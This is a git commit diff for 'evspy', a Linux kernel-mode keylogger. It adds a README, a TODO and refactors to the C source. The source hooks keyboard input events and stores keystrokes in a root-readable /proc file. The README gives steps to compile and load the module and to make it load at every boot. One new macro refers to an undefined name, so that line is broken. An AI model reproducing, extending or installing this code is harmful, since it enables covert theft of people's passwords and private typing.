Añadidos README y TODO, comentarios variosHEADmaster

4 files changed, 61 insertions, 14 deletions

diff --git a/evspy/README b/evspy/README
new file mode 100644
index 0000000..cbc8d2f
--- /dev/null
+++ b/evspy/README
@@ -0,0 +1,47 @@
+** INTRO **
+
+Evspy is a general purpose kernel-mode keylogger in (early) development stage.
+
+The file from where you can read the registered keystrokes is /proc/driver/evspy
+by default. Only root can read it. Beware users: evspy can troll you.
+
+Don't be evil.
+
+
+** COMPILE **
+
+	$ make
+
+
+** LOAD **
+
+	# insmod evspy.ko
+
+
+** UNLOAD **
+
+	# rmmod evspy
+
+
+** IS IT ALREADY LOADED? **
+
+	$ lsmod | grep evspy
+
+
+** PERSISTENCE **
+
+If you want evspy to be loaded every time system boots, copy it into your
+kernel module dir:
+
+	# cp evspy.ko /lib/modules/$(uname -r)/kernel/drivers/input/evspy.ko
+
+and update module database:
+
+	# depmod -a
+
+(In some distros it could also be necessary to add it to some rc/config file)
+
+Once it has been installed, you can load it when you want with
+
+	# modprobe evspy
+
diff --git a/evspy/TODO b/evspy/TODO
new file mode 100644
index 0000000..7303bf8
--- /dev/null
+++ b/evspy/TODO
@@ -0,0 +1,4 @@
+* Fix backspace key (do not erase special key events) - Prio:Medium
+* Implement 2nd mapping (shift) - Prio:Medium
+* Take a look at kernel's circular list API - Prio:Low
+* Which FX key has been pressed? - Prio:None
diff --git a/evspy/evspy.c b/evspy/evspy.c
index 50af056..39e87f3 100644
--- a/evspy/evspy.c
+++ b/evspy/evspy.c
@@ -31,7 +31,6 @@
 #include <linux/string.h>
 #include <linux/cred.h>
 #include <linux/sched.h>
-#include <asm/page.h>
 #include "evspy.h"
 
 
@@ -46,8 +45,6 @@ static char sp_tag[] = "<+XXX>";
 
 /*
  * Executed when the procfs file is read (EVS_PROCNAME)
- *
- * TODO: Take a look at kernel's circular list implementation
  */
 int evspy_read_proc(char *page, char **start, off_t offset, int count,
 		int *eof, void *data)
@@ -107,7 +104,7 @@ static void special_char(unsigned int code, unsigned int value)
 	int i;
 	int known = 1;
 
-	// We don't care when some special keys are freed; add them here
+	// We need to know when some special keys are freed; add them here
 	switch(code) {
 	case KEY_LEFTSHIFT:
 	case KEY_RIGHTSHIFT:
@@ -158,12 +155,10 @@ static void special_char(unsigned int code, unsigned int value)
 		known = 0;
 	}
 
-	if (!known && evs_isfX(code)) {
-		// TODO: Which F key has been pressed? (by the way, who cares? ... )
+	if (!known && evs_isfX(code))
 		strncpy(sp_tag+2, "F??", 3);
-	} else if (!known) {
+	else if (!known)
 		return;
-	}
 
 	if (value == EVS_VAL_PRESS)
 		sp_tag[1] = '+';
@@ -195,9 +190,8 @@ static void evspy_event(struct input_handle *handle, unsigned int type,
 		special_char(code, value);
 
 	// "Direct" keys (alphanumeric + some symbols)
-	else if (value == EVS_VAL_PRESS) {
+	else if (value == EVS_VAL_PRESS)
 		evs_insert(map[code]);
-	}
 }
 
 static int evspy_connect(struct input_handler *handler, struct input_dev *dev,
@@ -212,7 +206,7 @@ static int evspy_connect(struct input_handler *handler, struct input_dev *dev,
 
 	handle->dev = dev;
 	handle->handler = handler;
-	handle->name = "evspy";
+	handle->name = EVS_NAME;
 
 	error = input_register_handle(handle);
 	if (error)
@@ -249,7 +243,7 @@ static struct input_handler evspy_handler = {
 	.event = evspy_event,
 	.connect = evspy_connect,
 	.disconnect = evspy_disconnect,
-	.name = "evspy",
+	.name = EVS_NAME,
 	.id_table =	evspy_ids,
 };
 
@@ -275,3 +269,4 @@ module_exit(evspy_exit);
 MODULE_AUTHOR("Guillermo Ramos <0xwille@gmail.com>");
 MODULE_DESCRIPTION("Event based keylogger");
 MODULE_LICENSE("GPL");
+MODULE_VERSION("0.1");
diff --git a/evspy/evspy.h b/evspy/evspy.h
index 626dc2f..3df0c9e 100644
--- a/evspy/evspy.h
+++ b/evspy/evspy.h
@@ -2,10 +2,11 @@
 #include <linux/input.h>
 #include "maps.h"
 
+#define EVS_NAME		"evspy"			// driver name
 #define EVS_MAP			map_es			// change this to your keyboard layout
 #define EVS_TROLL		1				// clear this if you're a serious guy
-#define EVS_PROCNAME	"driver/evspy"	// virtual file within /proc
-#define EVS_BUFSIZE		PAGE_SIZE		// size of the circular buffer
+#define EVS_BUFSIZE		PAGE_SIZE		// size of the circular buffer (4K)
+#define EVS_PROCNAME	"driver/" EVS	// virtual file within /proc
 
 #define MIN(x, y)	(x) < (y) ? (x) : (y)